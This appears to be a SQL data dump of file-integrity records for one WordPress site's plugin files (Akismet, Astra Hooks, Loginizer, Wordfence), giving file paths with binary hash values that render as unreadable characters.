('–—w×#ÌQ‡ÃÆú˜­', 'wp-content/plugins/akismet/views/predefined.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/predefined.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ò#>ajÏ¬a”¥½ÏØ4ï', 'ÿwðšs°ÐbN}¼qY…Çý7zo•Uæªuô''¡¥Ö1', '', 0, '?'),
('}spKï¹ñûý© Ûô:¤', 'wp-content/plugins/akismet/views/setup.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/setup.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eYâ]ŽZ¡.^<®±&Un', '²Gž,|ã8ÎÚÓîà£Éi1ÿÐ<2Ú,‡8Õá+w', '', 0, '?'),
('¡Þ;ã;/JÃKmRÿ—0', 'wp-content/plugins/akismet/views/start.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/start.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'x(å	å¡ç¦(î§õÖ:„‹', 'ù™­	3`¤+BàŽvY-‡¡k- âæ^?&è§', '', 0, '?'),
('s¦ìÓ£Jö³Å~’çk', 'wp-content/plugins/akismet/views/stats.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/stats.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '^=-ÔÇm•öWw­xgPO', '	.-õï[\r³Wú“y\nÆÐØ%ŸBÁn”Qb¡B¼w', '', 0, '?'),
('Çk8Q?<×ŠÓ£y™p‰', 'wp-content/plugins/akismet/views/title.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/views/title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷X¤CN3|)-Î2Na©±²', '¢‘štûCzô ž¤Ín`j\r­MÍðN"Agó×æ', '', 0, '?'),
('dF=úˆÏjˆ²Hcÿ ‚–', 'wp-content/plugins/akismet/wrapper.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/akismet/wrapper.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆ]x¦"šY—‹ÚŠïKJ', '\Z“Iaú^à’°ñëiJ‹žHŠ:žjê:•ºÀbÂÂŠ«', '', 0, '?'),
('o’q7ÇoKdsÁõÌ ‚’', 'wp-content/plugins/astra-hooks/astra-hooks.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/astra-hooks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÇýHâ"¶LøÝ8''r†', 'žÊ‚yËIšEMšº\ró¨ÕáM.¬NÊ0°Í‘Mn', '', 0, '?'),
('Ê<ÔhwÕƒö0¦A,½…Õ—', 'wp-content/plugins/astra-hooks/classes/class-astra-hooks-loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/class-astra-hooks-loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'øy\0!Ö9Zë·ˆUô¯-Š', '©7ÝêÒŽçà­]Uàê-ìÕ]"ü1®‚­È‡§ÄMhí', '', 0, '?'),
('~–/+9 ”Ø\rR!a±Ñ', 'wp-content/plugins/astra-hooks/classes/class-astra-hooks-markup.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/class-astra-hooks-markup.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Üm¸ý˜1!Oä{ß‘?î', '©Mˆ×¯*.l3îÑ0<ŸcàGÉ\nY´]òRæytaX', '', 0, '?'),
('ú¾nŠŸ<R—:T¯±', 'wp-content/plugins/astra-hooks/classes/class-astra-hooks-white-label.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/class-astra-hooks-white-label.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×<`Í]Ãj=]„üôã}á\r', '_xè N ñE\0<ó?ù=ÌÚ2ìOêc,r×&·', '', 0, '?'),
('ÎÁÓ^Åè*¹”+°&', 'wp-content/plugins/astra-hooks/classes/class-astra-hooks.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/class-astra-hooks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ØX°w³$•åœOÎv¢Ê&ò', '¼;\nŒ*·3‹'')—i…èkÕ¶ö?xP§\r$˜‡Ñ½)#Fµ', '', 0, '?'),
('-sÚLB!}Þ­zx¯©1', 'wp-content/plugins/astra-hooks/classes/customizer-panels-and-sections.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/customizer-panels-and-sections.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''CCCöSÚaƒ\0ÙP¥h', '¶ôÇÛLò©sRÜ¨¢R7ƒ¦„…‹‰Æ©¯õ§æ­', '', 0, '?'),
('ökôNsÙ´˜æ¥Lx¼', 'wp-content/plugins/astra-hooks/classes/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÝôšÎ)­O¿%Ng8>Ù½i', 'R`\Z§ªÌ4ž¡ŠÆ¼Vj¢9\0Êqg¡épÎr`¨', '', 0, '?'),
('ÒÞâRYV¯_æLvÈÇ', 'wp-content/plugins/astra-hooks/classes/sections/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/sections/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÝôšÎ)­O¿%Ng8>Ù½i', 'R`\Z§ªÌ4ž¡ŠÆ¼Vj¢9\0Êqg¡épÎr`¨', '', 0, '?'),
('­¬!·bF†»€¶&ôöƒ', 'wp-content/plugins/astra-hooks/classes/sections/section-hooks.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/classes/sections/section-hooks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ð™iÙáøP5‚}CkÕ¬}V', 'ÁD?¤:QÑ)šqtÆÃ“®ínsXçDT?!þ%Ž÷', '', 0, '?'),
('˜!ÚMoWZôŸF¥$WÖ', 'wp-content/plugins/astra-hooks/includes/white-label.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/includes/white-label.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»,ƒ²›Ô`ÕßŠÀ¨B•', 'G/×„YC¾Ã\nÀÚ"Ø8èóÅéð!öúr1àk', '', 0, '?'),
('ÖÅ-—ëìæ™ ‰&Z', 'wp-content/plugins/astra-hooks/languages/astra-hooks.pot', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/languages/astra-hooks.pot', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\nwäæb\nâIÖRLÌ¡h', ')¸Ç¼RŠñ¥dw–&B+o‘KºVôè~#	aˆ²ëL', '', 0, '?'),
('e#\rF,ÐþUDÜ˜^z7x', 'wp-content/plugins/astra-hooks/readme.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/astra-hooks/readme.txt', 0, 'áÏ7‹b.HÐ0ÉO·¥', 'áÏ7‹b.HÐ0ÉO·¥', 'ýE¤z	[‹6+jü„©:¬”±º–YãÌŠu‹N	\n', '', 0, '?'),
('ÔèòÿåÍ0*îWÇÔ', 'wp-content/plugins/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/index.php', 0, 'gD,Vë§=\\ÆbP', 'gD,Vë§=\\ÆbP', 'k‰À—~	¶½UH\Z¥ÖxƒPêÛAÌ„¢ú<¡ž;X¨', '', 0, '?'),
('p?u»;¯0^†zè¿Ü;H', 'wp-content/plugins/loginizer/assets/images/backuply-black.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/backuply-black.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶”a—cB%4w«''Uæ¼&', 'ß^½¬6FáÔ*½ÀO+*q­kÑß:ó‰(]†^ø', '', 0, '?'),
('îHÀ*ˆL¦«ñ";@4Ò', 'wp-content/plugins/loginizer/assets/images/backuply-square.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/backuply-square.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ié\\¢t/ïµûçgüzä', 'çgþyâ ÃÍÈ«×Y"ˆPÜ,	m (Í·-n', '', 0, '?'),
('&ïæ»z´:\Zµ ¶ ¼†', 'wp-content/plugins/loginizer/assets/images/facebook.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/facebook.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰¯;`j;Ëïmîc@)Rá', '•Àv:ä‰†Sh¥?lÌcSŒÏµ	*%ÍÙk9ö®û', '', 0, '?'),
('y^''â˜Cî€îC‘É<', 'wp-content/plugins/loginizer/assets/images/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»Å¢ÜÂxã…“[å¡\nr', '’íQ‡YÙ…Örálëû.¢!LµIKŒ@™¦G¤«oi', '', 0, '?'),
('e…zÙ©¥~¾]{Ï›KÜ', 'wp-content/plugins/loginizer/assets/images/loginizer-200.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/loginizer-200.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$oð×0è~W+£’LêÚT1', '[_¹†¢#@­eh”²0R¾eÞ2<\n|Éø', '', 0, '?'),
('ÛáìÌ\Zýñ=E²•Eô', 'wp-content/plugins/loginizer/assets/images/pagelayer_product.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/pagelayer_product.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ùÔÛèö @4ÔLÔ*`|', 'ŠÍ06öa[_u>s”·3Ðû—¢Ø@Š«qÄ¤(¼', '', 0, '?'),
('Å/ÅðÒ…¬eÈ\\…«FK', 'wp-content/plugins/loginizer/assets/images/twitter.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/twitter.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '˜ck zP´³½âÐ}}', 'zÃ@ö51ûcØ¸ñâ;‚£oì\r/V“¾.''ç–°', '', 0, '?'),
('ãC(‡¦Å`›ÆfÄ×I£Y', 'wp-content/plugins/loginizer/assets/images/wpcentral_product.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/images/wpcentral_product.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@Œe÷]}¼Š?©ÕŽì', 'ÐaL}¬—:|4°j»´¤´·Š$­›×{ËŠî', '', 0, '?'),
('aÝç5îEÀ\n¡Cò+/¡Õ', 'wp-content/plugins/loginizer/assets/js/chart.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/js/chart.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á^5PŠ±—€éÎXú<', '4ŠîÖZö!_¹æŠÁ!L	þê±µç%O£3Ë¡•WŠ', '', 0, '?'),
('¦Æ\rGy5@QyõH¢ý', 'wp-content/plugins/loginizer/assets/js/jquery-paginate.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/assets/js/jquery-paginate.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '	¯y’1Z–ÖÏS¢ß-', '˜U‰¤Éß°Mm¥ât­Š4´½ËE2S9—\ZÂ#p', '', 0, '?'),
('Ó\0ãóù"QÚHáÂË÷', 'wp-content/plugins/loginizer/functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gÌP´ÃÓ™Á‰S\0o;ø±D', 'ItÅïÏòš$öÚÔUsÃþœ''©ÑtììFˆê', '', 0, '?'),
('ì Œa½†<9š', 'wp-content/plugins/loginizer/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»Å¢ÜÂxã…“[å¡\nr', '’íQ‡YÙ…Örálëû.¢!LµIKŒ@™¦G¤«oi', '', 0, '?'),
('Û"ƒñt_œ&<@]W', 'wp-content/plugins/loginizer/init.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/init.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Âßråãd4¹Uä#öøv', 'N»]_ëtwÑÔû$´)zhlØ''>ä›lÍl‡õ^¸', '', 0, '?'),
('Y]mx°¬Ê^ï/ÓÈyIt', 'wp-content/plugins/loginizer/lib/IPv6/BigInteger.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/lib/IPv6/BigInteger.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'æº¯Ë¡Ð4Æ2ß¿&Àê£', 'å	ñÓùM4¶åÉ•îpÀ¤¾“ÖŸ\\”	äé”', '', 0, '?'),
('NÄ\0ÞGÏ(Ëú5Ûl‰', 'wp-content/plugins/loginizer/lib/IPv6/IPv6.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/lib/IPv6/IPv6.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+JÉadq•«Qâ”Z', 'Ñ#Šµ‰çŽF™nª¶¼lã6zÇ''ó±ë¡œ6wÉ', '', 0, '?'),
('ÂÄ¦Z¼Ï¿n}ç‡Ûˆ×', 'wp-content/plugins/loginizer/license.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/license.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'O½e8Ý%YQ³dQl', 'X¹óÄQ¼œ\Zc¿â6?€pAHB5ÂNÖpJyõ@', '', 0, '?'),
('ëUõ¡ó…''²ƒ²ÜÍ¯²ï', 'wp-content/plugins/loginizer/loginizer.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/loginizer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡»„bÑ|ëSElÓ.', 'SÚÃ(z¸\Z±ºUVÁÿ K0s€ˆ§>­P®·“ÚÂ­7Ð', '', 0, '?'),
('è7Ãç²{ß‰ë‘ÊËL!', 'wp-content/plugins/loginizer/main/admin.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/admin.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fkc”æña:M˜¹zeÜ', '|†Nñ›8º9;$Ù³>´\nBYé“á$ÅKáEêû', '', 0, '?'),
('S¼?#–ª/Çšn	TkÄø', 'wp-content/plugins/loginizer/main/ajax.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/ajax.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0˜]QUº¸ôøµ`Oã', '(ö^±ÒÌ ÈªDVd‰)›œB]ˆò‚GSÆ', '', 0, '?'),
('«1ÓéôüÍ[zä!×', 'wp-content/plugins/loginizer/main/settings/2fa.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/2fa.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚšÈë@/™xq#Ðó¼1j', 'É*°îh(\0Ô^AZ³+3­b‹+@”ûp‘Ÿ¤e', '', 0, '?'),
('Tï,cÑ*Ó`Ü6B5Þì', 'wp-content/plugins/loginizer/main/settings/brute-force.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/brute-force.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ëõ§5|•ãÇ@^u–”v<', 'Œ…(i5,ë<zÛq¦Æž—…¯b''á\ZÅ¬?hù|', '', 0, '?'),
('CW!d£®öaÌÓÍÑo', 'wp-content/plugins/loginizer/main/settings/checksum.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/checksum.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µrž¹O2ÁJüëQ»', 'ž”›{6½Ë`gfTwô“w7×p²¸ÜÒHU’', '', 0, '?'),
('šòÝÄ(ý—û`Ó.ó‹', 'wp-content/plugins/loginizer/main/settings/dashboard.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/dashboard.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '%Ï²	Rb%)´h9óûM', 'ƒ{®W¶ÛjKŠÆçÈÀH—Æ¬±Xô³úFÂ¦®)', '', 0, '?'),
('â´ßÇ¡i—KFÇ¡E™µ±ª', 'wp-content/plugins/loginizer/main/settings/passwordless.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/passwordless.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(\Z¯é•þØ­ÆÒÙÂ', 'žf&‡fTE%Ï/Í¥O|Mê‡ ‡¼–!›wmNî»´', '', 0, '?'),
('£—AƒÂíY×šfM6»´Ë®', 'wp-content/plugins/loginizer/main/settings/recaptcha.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/recaptcha.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#þÒÞmðXqÿ-#-[¦', 'ÿk:V…ICq,hŠ°ûûHÓ­¸Ê|MÆ”lBF‰dÿ', '', 0, '?'),
('``³˜döRRýÌŠùÓaNá', 'wp-content/plugins/loginizer/main/settings/security.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/security.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™¬6ï»1þ°Ì_ÎÅà', 'åZrJynÍšœç­cÅ˜Wúû?vÈ-Æ@‡&l^¹€1e', '', 0, '?'),
('Ó™Âfà…ñ¿£SÀdÂ‡9', 'wp-content/plugins/loginizer/main/settings/sso.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/main/settings/sso.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÈlÀ"¹âIÎU¡<ö', 'Â±·šm±¨°3bE0x~P~Hë8Éõ\\ë/hii³™', '', 0, '?'),
('®	³ï"ÈR$â}÷G‹', 'wp-content/plugins/loginizer/readme.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/loginizer/readme.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5ë$…©HR^tªÍ=o', '¶:Î>H”eª†‰5ª1ÒkT„p Fo§kÆà{_s‹', '', 0, '?'),
('ÞÎ*(³“*­+¯Wj”cp', 'wp-content/plugins/wordfence/crypto/vendor/autoload.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/autoload.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œ£3Ô¿:á“V«	˜ŠU''', '“»ö|<ÑÔþP*tg«3dYsÏß/‘€ûÐø‘', '', 0, '?'),
('ÕBImSÀÔ96ß7’†ðX', 'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì "UE"´Eb;Dånð', '‹©Ô±ë»r–gÜêCXJUË1ø’Ö‰Ya,Ùð1', '', 0, '?'),
('Cžy²Òõ8Ý''a¼Êý', 'wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'q~±f‘¦œ¥ïŒÍîë“"á', 'p,Õ-ÚgW¿‡ÔŽõ¼W‚Ò.cýE‚¢²âM', '', 0, '?'),
('S­“ù\nápÞG%­', 'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•]_åŒ#Dö´\0óƒµâ', '\Z ŸøÛ’ö%§4~NÙ~Gh!bØ­:w‚˜ÉŒ¿™''', '', 0, '?'),
('a5ÂÍ…Bˆ_ó­sÎ', 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°šyÅtPº>Ra­Sô@-', 'u{4ó¹·s…ñÁJ‰ˆ÷Ì3÷H¨×6owËr', '', 0, '?'),
('ÿkŒùþÏPP™˜1<Ã', 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êouÍlçÛ_›4@«¦', '6b% "ÄÊ´sÑJëp3°¿·ç8Ó·ƒSÇ™:ú±ƒ‘', '', 0, '?'),
('‹ðMAHöÌô\0êœ[d_×!', 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5á,}vÄ¨3¼õGÀâ)©', 'E½r4@\0¸Ô¡$¦âzæú3ð¸$l²ê\ZÐ`iäexÃlÊ', '', 0, '?'),
('8Y­õÅv¿ëCÉ[,ž‰', 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ý:\0ðÑ>²—íØÇ}LQ\0', 'ÀïÃ_U\0]q=Õ‰Š®f\\¿/ 	@d¡Ì\r¨+vÜ*(', '', 0, '?'),
('úàZ–p%''n\Z‘ªWjµå', 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '˜¿ o@3e€]@"©€', 'ížFÌÏE(Û›6áDí‘d7ABGÌ U*', '', 0, '?'),
('PKˆ³2´Iªó«Á)¥‚', 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'y¦šw5ãí(nÂb¨m­', 'm!`Ú~:›î-\n¼&3@ïåNßÍ[ý9êæ¦d\r®', '', 0, '?'),
('&PDtÅ?5uø1Ym²Ø', 'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/installed.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'íXyó~ÿXéóÜéÅC‚', 'à”µB˜þ¸ˆ:z±ÅÊ‰Ì‚DPÚ’¤ì›lø\Z•…-|', '', 0, '?'),
('ïú¶ÕË•§³r&ÕqÇFi', 'wp-content/plugins/wordfence/crypto/vendor/composer/installed.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/installed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½!y¥WU[«u3FQ', '×òóÄ·ÖÍž&Fœ’åIéäfY°GŸ¼‹ªßåþŸ0', '', 0, '?'),
('^Á±uëºuƒ¬W‘dœM=•', 'wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÆzÖØ=E‘o0¯´[ò±', 'µm?\ZÃ"Êgë=€0àN"„öQ‡ˆ`¦u''ì°ë~I', '', 0, '?'),
('íNÝÔ''¢!\rBÄj¶Ë3Ï', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\HÉÖ!#š¦>báW‹æ', '–&ßxÁ†wÓÎ±hØÄ)šÅ“@5mßÒ.)9ßR', '', 0, '?'),
('F|÷œ§§wÜZQ,O—þ', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6ÚãÏ?Ñ\nå	:®Â›{Q%', '„ß—ZªIK/IµøwÂ¥‘Ovy›EøBi\\$G‹&', '', 0, '?'),
('O4‹Ç³WQ™\0”ÒRøï', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>Çˆ­»©"Cåixœü¹', 'ðªËxçœª!™¢ŸÄ}ò—\Z¶…˜Ê‚Wª¯úËd', '', 0, '?'),
('ÜÌä.ÜUÛ	ý¯Yää=', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾h„Á³`‰·ÁœV“Af', '<‰\\žGòÌ;1#½Àk©L´—Ã Ãƒ(Öƒ', '', 0, '?'),
('>GÇ­OäjPÕl¨îB', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þÜ$›]\\³â¢çÒÆÇÒ', 'Øšx"ƒoŒ*Iç\nQ›Òj¸·ƒŠçT(óG\Z¬.¢\Z', '', 0, '?'),
('1-Àÿõîø×g97¹å×', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#fG«\rÖ‚·‹Bî¬Ÿg 0', '‘¼cÞ(±Œ¢¿k1ž†íáúî•2‚Qw4ûÊ?0', '', 0, '?'),
('Û46ï1ÂmÎÍùYR', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4øtá×QSDv’¾ô˜À', 't!…BûŠxV\\ÎN<ÿ»tpÏ!SEÅÐ³‰–', '', 0, '?'),
('\r€çþàËX°öÀ­+Ã-Ta', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ¼ÓÓÙO>AÜ+ä=\Z,', 'ëåUâsìÝÎÂDŽMÃ™ÆdÍÀ€(Ï\0ƒ±Ä¦~ÍÌÇ', '', 0, '?'),
('–Â Ïv…‘Æšbu)', 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ä=Y˜‘‹™@ü¹Ó·_¥x', 'Þ°Ê\Z^3ÃÉŸv‰U.a\r]fßhâI…™(sõÆA', '', 0, '?'),
